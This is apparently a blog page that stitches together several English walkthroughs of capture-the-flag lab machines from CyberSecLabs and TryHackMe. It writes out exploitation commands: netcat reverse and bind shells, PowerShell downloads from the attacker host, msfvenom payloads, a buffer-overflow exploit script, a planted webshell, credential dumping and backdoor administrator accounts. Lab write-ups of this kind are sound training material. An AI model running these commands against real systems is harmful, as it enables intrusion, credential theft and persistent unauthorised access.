Beveiligd: htb-endgame-hades

De inhoud is beveiligd met een wachtwoord. Vul het wachtwoord hieronder in om hem te kunnen bekijken:

Geplaatst op


NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.
Today let’s play  CyberSecLabs Stack at



nmap -p-
Running a scan of all 65,535 ports went quick, and revealed numerous services that could be available.  So I took the information from above and ran an Nmap -A scan to get a better idea of what I was working with.
nmap -A -p80,135,139,445,3389,5985,47001,49152-49165
Great, we can see a lot going on here.We have a web server running Apache, SMB services, RDP, a couple additional web server looking applications running as well. Now that we know what we’re working with, we can move on to enumerating it.


I personally start from the top of my scans and work my way down, so naturally I started with the web server running on HTTP port 80.  Visiting the page returned a page not found error, however running a Gobuster scan against the address showed me a /web directory.  This proved fruitful.
page not found error
 ./gobuster dir -u -w /root/Desktop/directories/
Now that we found a directory, a quick check of it shows that the server is running the GitStack service. directory GitStack results
When we enumerate a service it’s always important to research in to it more, especially if it isn’t something you’re familiar with.  This was incredibly useful, and provided the path we needed from here all the way to the finish.
searchsploit gitstack
Awesome! GitStack has several exploits possible, and while we could easily take the fast route to flags, we are going to take the manual method this time around.  Let’s explore this exploit some more.  A Google search showed it listed on ExploitDB.

exploitDB results
A quick check of the code for the exploit shows that it is extremely straight forward, and appears that simply changing the IP address is enough to get the ball rolling.  Also of note is the command variable, which is what the exploit suggests is the variable we can modify for remote code execution.
IP address and command variables for RCE
Since the exploit is located on our machine already, I simply copied it to my working directory for use.
exploit copied to working directory


Now that we have a possible exploit to use, we can get to work building out or vector. We change the IP address to the target address, and for now leave the command to see what happens.
exploit creation and results
And to be honest, here is where my jaw dropped a bit. Non-verified exploits on ExploitDB are hit or miss, and this one hit big time.  We now know a user name, and can start digging deeper in to the system.  We first start by enumerating the working directory (please note that the nc.exe and exploit.php are from me, and were not available upon startup).
command changed to “dir”, which showed the contents of the working directory
 Being as we are in a lab machine, we know that flags are typically kept in a user Desktop directory and Administrator Desktop directory.  Starting with the user John, we can manipulate the command in the exploit to show the contents of the Desktop directory, revealing the access.txt flag.
directory contents of user John’s Desktop and access.txt flag
Next we can pull the contents of access.txt utilizing the “more” command.
more command to reveal the John user flag
Now that we have the user flag let’s get out of the RCE via Python exploit, and in to an actual command line. For those not well-versed in Powershell, it has a “wget” command that allows us to pull files from external web servers.  So we can spin up a Python Simple Server on our Kali machine, and write out a wget script using Powershell to pull a Netcat binary from Kali.
Python -m SimpleHTTPServer 9876
“powershell -c wget ‘’ -outfile ‘nc14.exe'”
The 200 traffic in our web server shows that the Netcat executable was pulled successfully by our exploit.  From here on out, we will simplify things using the Netcat binary on Windows.  To confirm first, we run “dir” from the Python exploit to ensure the copy happened, which it did (as before, multiple nc.exe exploits are due to my experimentation, and were not there to begin with).
 netcat binary copy confirmation
Now that we have a Netcat binary in the working directory we can use it to get shell access the machine via bind shell (you can also do it via reverse shell).  I used nc14.exe as that is how I named it, however your naming convention will be different.  Running the listener on the Windows machine allowed me to connect directly via Netcat from Kali, giving me a stable command shell to the target.
Top Right – modified python script to act as a bind shell listener; Bottom – command issue
Top Left – Bind Shell connection to command shell
We now have a stable command shell on the target.  From here on out we are finished with our Python exploit, and you can close it for now.  Enumerating users more showed that the Administrator directory has elevated access privileges that our user account doesn’t have access to.
 whoami stack\john
Administrator access denied
 After poking around for a while I noticed that user John had a password_manager.kdbx file in his Documents directory (again, please note that the Netcat executables were placed by me during exploitation, and were not in place beforehand).
password_manager.kdbx in Documents directory
Let’s look in to the password_manager file.  This turns out to be a KeePass database extension.  Researching further showed that KeePass hashes can be cracked using John the Ripper.  So we have a vector, and need to get it back to our Kali machine for exploitation.  We can do this using Netcat, however we are currently using it to connect to our machine, and we cannot run it in multiple instances.  To bypass this, we can use the Powershell wget script to pull another copy to our current directory, and change the name of the output file.
powershell -c wget “” -outfile “nc3.exe”
We now have another available copy of the Netcat binary on our machine, and can use it to transfer the database file between our attack machine and the target Windows machine.  We do this by creating a Netcat listener on the Windows machine that sends the file to anyone connecting to the machine on that port.  We then connect to the target machine and port using our Kali machine, which transfers the file to our working directory.
Right – nc3.exe -v -w 30 -p 1337 -l < password_manager.kdbx
Left – nc -v -w 1337 > password.kdbx
Now that we have a copy of the KeePass database, we can attempt to harvest a hash from it.  We do this using KeePass2John.
keepass2john password.kdbx
 As we can see, we are able to successfully harvest the password hash for accessing KeePass.  Fortunately the database administrator uses a poor password, and we easily crack the hash using the Rockyou password list.
john -format=keepass tocrack -w passes/rockyou.txt
 Using the password we discovered, we can log in to the KeePass database, and easily harvest the credentials of both the Administrator and John users.
administrator password

Now that we have a password, let’s try to get in to the Administrator’s account.  We can do this by utilizing stack/Administrator:<passhidden>@
And as you can see the parameters worked!  We have NT AUTHORITY\SYSTEM access privileges.  Which means we also have the system flag.
MayorWasHere and system.txt flag


NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play  Tryhackme’s Gatekeeper at

This is a writeup of Gatekeeper from TryHackMe.

The goal of these writeups is to share with others whilst developing reporting habits and improving my own process. This writeup will not include any passwords/cracked hashes/flags.

Credits to the room creator/s.


First, we will connect to the VPN. If you are not familiar with the process go through this room first and the other ‘getting started’ rooms.

Once we are connected we will deploy the machine:

When we click deploy, the machine will be started and we will need to wait a few minutes for it to get setup. We will be given an IP for the machine, in my case it’s and the time limit which we can add to if we need to:

For this machine I’ll be using a Kali Linux VM and a Windows 10 VM with Immunity Debugger installed.


First, we have the following hint from the room description:

Can you get past the gate and through the fire?

We will start off with an nmap scan:

Taken from our scan results we have:

We have usual ports for Microsoft Windows RPC. We have SMB on ports 139 and 445, RDP on port 3389 and an unusual port open at 31337. From these results we can assume that we will enumerate SMB further and whatever is happening on port 31337.


To begin we will enumerate SMB using smbclient:

After using smbclient to try listing each of the disks we discover that we only have access to the Users disk. There might be useful files or information disclosure stored on SMB so we will take a look:

Listing the contents we descover Default, desktop.ini and Share. Out of all of these share is the most likely place to look. We will change directory to Share from the smb prompt and list the contents:

In the Share directory we find gatekeeper.exe, this is likely to be part of our attack service. We will download the executable to our Kali machine:

We also want to enumerate what we can from port 31337. To do this we will use netcat:

When we press return the port responds with ‘Hello !!!’. If we add input at the prompt we get a response of ‘Hello <our text>!!!’ :

There is a program running on port 31337 that accepts user input. This indicates to us that it may be vulnerble to buffer overflow but we don’t want to test that on a live machine and risk crashing the service and having to reboot the machine. Assuming the program is likely to be the gatekeeper.exe we found on SMB we will use our Windows Lab machine to run our tests.


We will setup a python server in the directory containing our executable and download it onto our Windows Lab machine. From Kali we will run:

And from our Windows machine we will run:

Now we have the executable on our Windows Lab, we will run it and connect to it using netcat same as before:

We can confirm that it is the same program and we can catch the response back on our Windows machine:

When we send through some data we can see that the program is counting the bytes received and the bytes sent. If we can crash the program we may be able to create a buffer overflow exploit.

First we will setup a script that we can use to fuzz the program:

address = ‘<target IP>’
port = 31337
buffer = [‘A’]
counter = 100

When we run our script we crash the program at around around 202 bytes:

We can verify this in Immunity Debugger noting that the instruction pointer (EIP) has been overwritten with four A’s. We carry on from this point to create an exploit for this vulnerable program:

Buffer Overflow

I have a skeleton exploit script that I use for these kind of buffer overflows and with a couple of changes you can adjust the fuzzer script above to work the way you want it to. We will go through each section step by step without giving too much away so it can remain a challenge.

Verifying the Script

The first thing I do is make sure the script makes the program behave in the same way as the proof of concept did previously. For this I will update my script with the target IP and port and make it so it sends a buffer of 210 A’s to our target application. This is what our buffer payload will deliver:

We run the vulnerable program on our Windows machine and attach it to Immunity Debugger:

This will load our application into Immunity. Before we run the python exploit we will want to make sure the program is running in Immunity and not paused. Let’s make sure our exploit crashes the program as expected:

We can see that our exploit crashes the program the same as the fuzzer. Now we can move on to verifying the offset of the instruction pointer.

Finding the Offset

For this we will generate a unique string using msf-pattern_create that we will send us the buffer. We can then use the value that overwrites the EIP to identify exactly where the offset is.

First, we will generate the pattern:

This will return a unique string of 210 bytes:

We will add this string to our exploit and comment out the previous payload. We only want to send the unique string as our buffer:

Next, we will go back to restart Immunity and run + re-attach gatekeeper.exe on our Windows machine. When that’s set up we will run the exploit:

We can see that our EIP has been overwritten with the value of 39654138. With this we can use msf-pattern_offset to calculate the offset:

Great, we have an exact match for the offset of 146.

Confirming the Offset

Next up for our python script is to confirm the offset. We can do this by modifying the buffer as follows:

If all goes according to plan we will overwrite the EIP with 42424242 (four B’s). We will reset our Windows debug environment and run the exploit:

The EIP is overwritten as expected verifying our offset. Next, we will need to identify bad caracters that musn’t be used in the payload.

Identifying Bad Characters

We have a setup section in our bof skeleton exploit for bad characters. We will replace the sixty C’s we were sending with our block of bad characters, meaning our buffer will send 146 A’s followed by 4 B’s followed by our string of bad characters. It is expected that the null-byte will be break the code so we have already removed this aas a bad character:

We reset our debugging environment and run the python script. We crash the program as expected and now we want to right click on our ESP register and select ‘follow in dump’ from the menu:

This will bring up our section of bad characters in the hex dump.

This is what we are looking out for. We can see that all characters are fine except for \x0A which has been changed to \x00, we will need to include it as a bad character when we generate our payload.

Finding a JMP ESP Module

We need to find a jump address that we can use to put in our EIP which will serve as a way of redirecting to our shellcode. We can do this within Immunity Debugger using mona modules.

After our previous crash we can type into the box just below the hex dump:

From this we will be checking for ASLR to be False. It appears we can use gatekeeper.exe if we can find a jump esp address within it. To check this we will need to search gatekeeper.exe for jump esp:

We managed to find two pointers we could user, neither contain bad characters. We will work with 0x080414c3. For our exploit we will need to adjust this to be in Little Endian format, like this; \xc3\x14\x04\x08.

Verifying Shellcode Space

We need at least 351 bytes available to us for shellcode space after our jump to esp. We will verify this by adjusting the payload as follows:

The expected result being after the crash 351 C’s are loaded into the ESP register. We can test this by running the exploit against the applicaion whilst it is attached to Immunity:

It looks like we will have enough space, if there is an issue here we can re-trace our steps and fix it.

Generating Shellcode

Next, we will generate our shell code using msfvenom:

We will copy the resulting shellcode into our exploit and setup our netcat listner:

We will have the shellcode replace the section of C’s in our buffer (be sure to remove / comment out the C’s), and run the exploit against our Windows lab machine, we also add a 20 byte nopsled before our shellcode starts:

We get a shell as admin on our Windows Lab machine.

It’s important to note we will have to make some adjustments to our exploit before running it against the target:

  1. Change the IP in the exploit to the IP of the target.
  2. Regenerate the shellcode using our TryHackMe IP.

With that done we can run it against the target machine.

Gatekeeper: Solving the Buffer Overflow

This is my first walkthrough and I though what’s a better topic then Buffer Overflow to start with.

extra notes:


lets attach it to immunity debugger and try to fuzz it

import socket,sys
from time import sleep
ip="" //change this

bof = ['A']
cntr = 100
while len(bof)<=30:
	print cntr
	cntr = cntr +200
for string in bof:
	print "Fuzzing with "+str(len(string))+" Characters"
	s.send(string + 'nr')
It crashes at fuzzing it with 300 characters

Creating a Skeleton code is simple :

import socket,sys
from time import sleep
bof = "A"*146+"BBBB"+"C"*(300-146-4)
	print "Fuzzing with "+str(len(bof))+" Characters"
	s.send(bof + 'nr')
	print "Some Error Occured"
EIP is overwritten with As (41=A in hex)
Now lets find out which of the 300 As we sent overwrote the EIP using pattern_create.rb script as follows

replace the 300 A with the output

When we run the script again we can see EIP is overwritten with 39654138 so querying it with pattern_offset.rb gives us the location as 146


Lets replace 300 As with following in the skeleton code:

bof = "A"*146+"BBBB"+"C"*(300-146-4)
We have successfully overwritten the EIP with Bs

Now we try increasing the number of Cs lets replace c*(300-146-4) with C*(1000) so we have some breathing space if it works

It does work and we have 846 characters of space for our shellcode

Next Step is to find the BAD-Characters :

In layman’s term bad characters have some special meaning for the specific application
x00 is the usual suspect (acts as truncate in lots of places)

We’ll simply replace Cs with all available HEX characters ie x01 to xff (almost every time x00 is a bad character so lets just save time assuming that it one)

as we see x0a is replaced with x00 indicating its a bad character

Now lets find the modules that we can use for redirecting the code execution to ESP as our Cs are being stored in the ESP

we use the mona to find the modules

!mona modules
we see that only module which does not have ASLR as true is gatekeeper.exe

now lets try to search for JMP ESP if it exists in gatekeeper.exe

!mona find -s "xffxe4" -m gatekeepr.exe

and we get two addresses where it is being used. Here I’ll be using the first address you can go ahead and experiment with the second one

We set a breakpoint using F2 And make changes in the code accordingly and We replace the B’s in the code with the address


When we run the script the program execution is stopped at the breakpoint showing that our code is properly calling the address and everything we did till now is working

And as we see we are successfully redirecting the code execution to the esp

We’ll use Metasploit Venom to generate the shellcode

msfvenom -p windows/meterpreter/reverse_tcp lport=4444 lhost= EXITFUNC=thread -a x86 -e x86/shikata_ga_nai  -b "x00x0a" -f c

Add the generated shellcode to the code. We’ll keep a NOP sled for 16 characters using : “x90″*16 before the shellcode.

Final test exploit will look something like this:

import socket,sys
from time import sleep
#addr =080414C3
shellcode=("--------Your shellcode------------")

bof = "A"*146+addr+"x90"*16+shellcode
#shellcode length can be 844
#badchar = x00x0a
	print "Fuzzing with "+str(len(bof))+" Characters"
	s.send(bof + 'nr')
	print "Some Error Occured"

Before running the exploit get multi/handler ready

We get back a shell

Now that we have the working exploit we can send it to the victim machine by just changing the IP in the msfvenom command for generating the shell use above.

working shell from the actual victim machine

Exploitation & Privilege Escalation

Method 1: Manually

We setup our listener:

And run our python exploit against the target:

We are returned a shell on the target. From here we can grab the user.txt file:

From here we can take a look at which programs have been installed by checking C:\Program Files (x86)\ :

From the output we can see that Mozilla Firefox is installed. Sometimes credentials can be retrieved from browsers so we will look into this further. After some further enumeration and hoping to find a manual exploit path I found this blogpost about credential dumping from firefox using metasploit.

Looking at the paths that the exploit tries to find files in let’s see if we can grab these files from our shell. We can find the files we need in the following directory:

The files that we want are listed in the directory:

We will transfer a copy of netcat over to the target and use it to send the files to our Kali machine. First, we will start a python server in our directory containing the nc.exe binary:

Then we will download the binary onto the target machine:

We can now transfer the four files we need to our Kali machine using netcat.



We can check we have all four files transferred to our Kali machine:

Now, we can use a tool called to get credentials from the file. We download the python file and run it:

kali@kali:~/thm$ python3 /home/kali/thm//foxfire/
2020-07-06 05:57:31,069 - WARNING - profile.ini not found in /home/kali/thm//foxfire/
2020-07-06 05:57:31,069 - WARNING - Continuing and assuming '/home/kali/thm//foxfire/' is a profile location

Master Password for profile /home/kali/thm//foxfire/:
2020-07-06 05:57:35,670 - WARNING - Attempting decryption with no Master Password
Username: 'mayor'
Password: '8CL7O1N78MdrCIsV'

We successfully recover a username and a password. We can now use psexec to get a remote shell on the system:

From here we can grab the final flag.

Method 2: Metasploit

We can replace the shell in our buffer overflow to be a meterpreter shell by changing the msfvenom command to use a meterpreter payload:

We run our exploit and we have a meterpreter shell:

Next, we use the module suggested to download possible files we could use, that firefox stores, to get credentials from:

With the files saved to /root/.msf4/loot/ we can continue the exploit as we did in the manual method.

Thanks to everyone who worked on the machine. Really enjoyed the buffer overflow into user and learnt something new to look out for with the privesc!

 msfvenom payload for Meterpreter shell

Reverse shell via multi/handler exploit

Utilizing the enum_applications module, users will discover that Firefox is running on the low privilege user machine.  No other exploits are available, despite local_privilege_suggester providing two different possibilities (local admin is turned off).  See below for the Firefox credential dump and enum_applications.

run post/windows/gather/enum_applications

 Credential dump with run post/multi/gather/firefox_creds

Now that credentials are dumped, users will be required to grab the Firefox Decrypt tool from Github (  Instructions are provided on the page, but in short, users will be required to rename the four different outputs from the Firefox_cred module.  See below.

Before renaming the files

 After renaming files appropriately

We can then run the Firefox Decrypt tool to dump the credentials from Firefox.

 python /root/.msf4/loot/

Finally, we can utilize the above credentials to log in to the “mayor” account using psexec. user:pass@ and NT AUTHORITY\SYSTEM

 Root flag

files used :

Author – Puckiestyle


NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.
Today let’s play  CyberSecLabs Sam at



From now on I’ve added my “MayorScan3000” portscanning tool into the equation when I’m kicking off, as folks have been telling me I waste time by not scanning all ports.  So I juiced up my port scanner to run with threading enabled.  Meanwhile I’ll still do my basic Nmap Scan as well to grab those immediate results.
 nmap -p135,139,445,3389,5985 -A
Nmap doesn’t return much information, but we do see that SMB is running on the target, which can give us a good start.  Let’s enumerate!


We can begin by inspecting the SMB service using smbclient.
smbclient -L
Running smbclient shows that there are several shares, with “backups” being accessible.  We need to investigate this further.
smbclient \\\\\\backups -U ”
Well this was pretty easy, right?  We’ve discovered a misconfigured share that allows anonymous access to the C:\. Let’s exploit it!


 With such unrestricted access to the file system, we should really search around some.  We can quickly check the Users directory, which shows us the user “jamie.”  Additionally we can head to jamie’s Desktop and grab the user flag there.
User Flag on Jamie’s Desktop
 So now that we have a flag, and a user name, we need to determine what to do from here.  We discovered a username, so we could try to enumerate that a bit.  Let’s use Crackmapexec for this.

crackmapexec smb -u jamie -p /root/Desktop/passes.txt
Crackmapexec makes quick work of locating a password for the user.  We saw port 5985 open earlier which means we can probably use Evil-WinRM to connect.  Let’s do that.
evil-winrm -i -u jamie -p redacted
We are successfully logged in!  We see that we are jamie on the machine, and now we need to get to escalating our privileges.  We can start by starting a Python server and pulling our tools to the target machine and running winPEAS to start.
powershell -c wget “” -outfile “winPEAS.exe”; C:\Users\jamie\Documents\winPEAS.exe
Keep in mind we are using PowerShell currently and need to provide the entire program path in order to run it.  Unfortunately we aren’t able to find any real information about the machine or escalation in winPEAS.  This was the same with PowerUp.ps1 as well.  I started scratching my head for a moment and had to remind myself that there are plenty of ways to manually enumerate privileges, services, etc.  Let’s do some of that.
whoami /priv
Our user privileges don’t show much that we can take advantage of unfortunately.  We can check for running services next.
services (not a typical way to execute this query)
The above took some trial and error because Powershell uses “Get-Services” to list the running services, and that wasn’t working as expected.  Running services did, however, which revealed the above.  Of note is the monitor1 and monitor2 services.  Unfortunately we cannot do much to gather more information on these from Evil-WinRM, so I decided to move to a reverse shell using Netcat, and get out of Powershell.  This required me to transfer a Netcat.exe binary to the machine first, and then connect to my Kali machine.
Top nc -nlvp 5555; Bottom C:\Users\jamie\Documents\nc.exe 5555 -e cmd.exe; Top – sc qc monitor1
We see that the service is running as LocalSystem, and that it can be started/stopped.  Knowing this, we need to ensure that we can modify the directory and it’s contents.  We can use icacls for this.
icacls Services
There is a lot going on in the above image, but what is important is that Users has a RX and W in the results.  This means that we can Read, Write, and Execute in the directory location.  Now all we need to do then is to replace the monitor1.exe with a malicious executable and restart the service.
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=2246 -f exe > monitor1.exe
We can not move this to the target machine, start another Netcat listener to catch the shell, and start the service.
Left – powershell -c wget “” -outfile “monitor1.exe”; sc stop monitor1; Right – nc -nlvp 2246; Left – sc start monitor1; Right – reverse shell successful
A quick whoami shows that we are NT AUTHORITY\SYSTEM.  We can head to the Administrator’s Desktop quick to grab the system flag.
System.txt flag on Administrator’s Desktop
We can additionally do some Post-Exploitation to take full control of the machine.
Right – net user themayor !Password123 /add; net localgroup Administrators themayor /add; Left – xfreerdp /u:themayor /p:’!Password123′ /v: RDP Login
A quick check of the server users shows that we are indeed a Server Admin now. 


NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.
Today let’s play  CyberSecLabs Imposter  at





nmap -A
We have several ports open, however the important ones to notice here are ports 21 and 8080.  21 is running FTP, and port 8080 is running WingFTP, which is a graphical FTP manager.

Enumeration & Exploitation

Enumeration begins with visiting the webpage, which we are able to actually log in to with the admin:password default credentials.  This quickly moves right in to exploitation
WingFTP login screen and Dashboard
Quickly poking around reveals that we are an administrative user, and are able to create an FTP user, which there currently aren’t any.


User Creation
We’ve created a user and granted them complete access to the file system.  This is where the unintended exploit was discovered.  WingFTP is running as a low privilege user, however by granting the access I did, I discovered that I was permitted to access the ENTIRE file system, to include the Administrator directory, System32 files, etc.  This is completely unintended, and after researching for some time I was unable to find anything in the wild that suggests this exploit has been discovered before.  I’ll be doing more research on this to determine if it’s simply a misconfiguration (which it shouldn’t be due to user permissions on the underlying machine), or an actual zero day exploit that’s not yet been discovered.
Now back to our regularly scheduled walkthrough.
We’ve now created our user, and can leverage it to gain access to the FTP service on the machine.  We’ll first need to log in to it, then create a payload with msfvenom, and can then utilize the Lua Console in WingFTP to execute it and gain a reverse shell in Metasploit.
 ftp login


 User lian directory where we will place our exploit (notice we have RWX permissions on Administrator)


msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=5555 -f exe > pwn.exe


 put pwn.exe file upload


Metasploit Multi Handler and Payload parameters


Reverse shell via Lua Console execution – os.execute(‘cmd.exe /c C://Users/lian/pwn.exe’)
At this point we have Meterpreter shell access to the machine and are able to enumerate our current user.  We can do this using the win_privs module first to determine what our privileges are on the system.
run post/windows/gather/win_privs
Notice that we can Delegate and Impersonate privileges.  In order to do this, we can utilize the Incognito module in Meterpreter.
load incognito; list_tokens -u
We notice that the NT AUTHORITY\SYSTEM token can be delegated, which we will use the impersonate_token command for.
 impersonate_token “NT AUTHORITY\SYSTEM”
With the token impersonated, all you have to do is snag the flags and complete the challenge.
 User and Administrator Flags




NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.
Today let’s play  CyberSecLabs Share at



As always we start with a nmap scan
nmap -A
As you can see we have a web server running on port 80, SMB on 445, and RDP on 3389.  We can note that the machine’s name is ENGINE for further reference.  Let’s continue on.
We are going to start by checking out the webserver on Port 80, however we get a default page.
Default Windows IIS Webpage
This is actually a pretty common occurrence in a penetration test, and can oftentimes be running services within subdirectories.  We can check for the possibility of this using Dirsearch.
python3 -u -e php,cgi,txt,exe,html -x 400,401,403 -r -R 3
Dirsearch has successfully located additional directories, and in this case specifically the /blog directory.  Let’s check that out in the browser now and see what we find.
We can see a page named “Alex’s Blog,” which appears to be running  Additionally, we can attempt to log in by clicking the login button in the submenu above.
 BlogEngine Login page for Alex’s Blog
I attempted to use default credentials I found online, but they were unsuccessful.  However, trying the tried and true “admin:admin” worked, and we successfully gained access to the administrator dashboard.  Let’s go back to the BlogEngine service we discovered earlier, and do some research.  Searchsploit shows the following results.
searchsploit blogengine
BlogEngine appears to be vulnerable to directory traversal and remote code execution.  Lets do some research and see if one of these exploits can help us gain access.  After some searching we do find that one of them (46353.cs) seems to fit our needs.
ExploitDB BlogEngine.NET 3.3.6 Exploit


Now that we have a possible exploit we need to figure out how to use it.  Fortunately this one is pretty straight forward.  We can copy it from our ExploitDB folder on Kali to our working directory and inspect it’s requirements.
Copying 46353.cs from ExploitDB directory to our working directory
Information Modification
So there’s a couple of things here.  First, we see in the bottom that we have to modify the IP address and port.  In the top we are instructed to save the file as “PostView.ascx” as this is the format that the BlogEngine service will recognize.  So modify as required, and save the file.  Once you’ve done this we can move ahead.
Now navigate through the dashboard to the edit menu for the one single post we can locate on the server.
Choose the post above
Click the File Manager button as shown above
From here you should see an upload button.  Select that, and upload your “PostView.ascx” file.
Uploading file
Now that the file is uploaded we need to navigate to the directory that we are shown in the exploit file.  But first, start a Netcat listener listening on the port we specified in the exploit.  If you’ve followed the instructions correctly, you should get a reverse shell when you visit the site.
Reverse Shell –
You’ll notice that the shell is funky and would benefit from an upgrade.  I do this by grabbing my Netcat binary using Powershell to get it from our Kali machine.  Remember to start your Python SimpleHTTPServer as well.
Bottom – python -m SimpleHTTPServer 8181; Top – powershell -c wget “” -outfile “nc.exe”
You can now start another Netcat listener on Kali, and run nc.exe from the target machine to connect back.  Let’s do that now.
Bottom – nc -nlvp 5555; Top – nc.exe 5555 -e cmd.exe
Great! We now have a more stable shell. Unfortunately we find quickly that we do not have access privileges to the user or Admin folders.  We will need to escalate privileges.
User folder access denied
We can use various methods to determine ways to escalate.  In this case I used winPEAS.  Let’s grab that from our Tools folder on our Kali machine and run it.
powershell -c wget “” -outfile “winPEAS.exe”; winpeas.exe
We let winPEAS do it’s thing, and once it’s complete we can go through the results.  One thing sticks out, which is some default credentials that have been found hiding in registry.
Default Credentials Found
Now that we have what appears to be Administrator credentials we can attempt to log in with them.  Noting that we early found SMB running on the machine we can use psexec or, in the case of this walkthrough, Evil-WinRM.
evil-winrm -i -u administrator -p PzCEKhvj6gQMk7kA -s /root/Desktop/Tools
You’ll notice that whoami returns administrator, which is what we hoped for.  Additionally, please make note of my use of the -s flag with the follow on directory.  This allows me you to run scripts and programs directly from the Tools directory on your Kali machine.  Neat trick!  Let’s grab our flags quick.
access.txt and system.txt flags found
If you’re here for just the flags, then congratulations!  You have completed the challenge and can submit the hashes to the CSL dashboard for the machine.  If you are interested in some basic post-exploitation, then please continue on.

Post Exploitation

Now that we have administrative access we can think about how we can provide continued access in the future.  As with previous guides, we can simply create a user and add them to the administrator group.
net user themayor !Password!123 /add; net localgroup Administrators themayor /add
 We saw earlier that RDP is already enabled, so we don’t need to enable it and can simply attempt to log in using XFreeRDP.
xfreerdp /u:themayor /p’!Password!123′ /v:
And we are successfully in the Server 2012 environment.  Open up the server manager quick to verify that we are in the Administrator’s group and you’re all set.


NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.
Today let’s play  CyberSecLabs Boats at


Port Scanning

root@kali:~/cyberlabs/Boats$ nmap -sV -sT -sC -o nmapscan
Starting Nmap 7.80 ( ) at 2020-05-30 20:17 EDT
Nmap scan report for
Host is up (0.11s latency).
Not shown: 988 filtered ports
80/tcp    open  http               Apache httpd 2.2.11 ((Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9)
| http-cookie-flags: 
|   /: 
|_      httponly flag not set
|_http-generator: WordPress 4.0.1
|_http-server-header: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9
|_http-title: Boats | Boats
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
443/tcp   open  ssl/https?
|_ssl-date: 2020-05-31T00:19:50+00:00; +1s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_IDEA_128_CBC_WITH_MD5
|_    SSL2_DES_64_CBC_WITH_MD5
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3306/tcp  open  mysql              MySQL (unauthorized)
3389/tcp  open  ssl/ms-wbt-server?
| rdp-ntlm-info: 
|   Target_Name: BOATS
|   NetBIOS_Domain_Name: BOATS
|   NetBIOS_Computer_Name: BOATS
|   DNS_Domain_Name: Boats
|   DNS_Computer_Name: Boats
|   Product_Version: 6.3.9600
|_  System_Time: 2020-05-31T00:19:26+00:00
| ssl-cert: Subject: commonName=Boats
| Not valid before: 2020-04-21T19:39:55
|_Not valid after:  2020-10-21T19:39:55
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49163/tcp open  msrpc              Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: BOATS, NetBIOS user: <unknown>, NetBIOS MAC: 02:33:63:0d:b9:ba (unknown)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-05-31T00:19:25
|_  start_date: 2020-05-31T00:12:56

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 206.08 seconds

Now we have WordPress CMS hosted on 80 port and we need to start enumerate a WordPress Plugins and Themes and Misconstructions and more to try to gain access to this application.

Application Enumeration

I will use a ffuf to fuzzing a directories and hidden files in application and on the other side i will run WPscan to scan WordPress vulnerable plugins and Themes and enumerating users.

After fuzzing directories i found a phpmyadmin path accessible without password.

Now I found a “WordPress” Table in Phpmyadmin and i can edit a “wp_users” table to login with admin account.

In “WP_Users” i found a user called “James” with “id=1” and this means this user has the administrator privileges and we need to change his password to login with his account.

I have changed a user_pass for james password to “secfathy” and select MD5 to generate a password with MD5 Hash.

Now we need to login with James account by using our password to WordPress Dashboard and to login to this dashboard we need to navigate to this following URL

Yes we have access with administrator privilege to WordPress dashboard and we need to get a reverse shell to access this machine, we have more than method like upload a malicious Theme or plugin with our backdoor with php extension or edit one of installed themes and replace this index page for example with our backdoor code to gain access and we can install a WPTerm Plugin to execute command on wordpress – but i will edit a Twenty Fourteen theme to add me code.

To edit a WordPress Themes navigate to Appearance Editor

I selected a “Index.php” page to add my code but I don’t prefer to use this method in production environment during any penetration testing assessment because if you didn’t get a backup, you will not be able to enter the main page of the site.

I will use a “p0wny webshell” to access a machine files simply

After select a “index.php” i add my a p0wny webshell code to access web-shell and to save this action click to “Upload File” button.

by navigate to machine homepage you can find a Powny Shell terminal and i executed a whoami command to know what is my privileges and a terminal return system – our goal now to get a user.txt flag and root.txt flag from this user desktop and administrator desktop.

by using a powny shell i navigated to “C:\Users\james\Desktop” and i found a “access.txt” file

Now I have a access.txt flag and we need to get a “system.txt” flag and by small searching i found this flag in a administrator desktop

Yes!! we own a system flag



NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.
Today let’s play  Potato at



sudo nmap -O -A -p-
kali@kali:~/cyberseclabs$ nmap
Starting Nmap 7.80 ( ) at 2020-06-25 10:33 EDT
Nmap scan report for
Host is up (0.10s latency).
Not shown: 990 closed ports
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
8080/tcp open http-proxy
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49163/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 20.86 seconds


We get a Jenkins login page  lets try some default credentials the good old admin:admin… 


Step 2: Exploitation

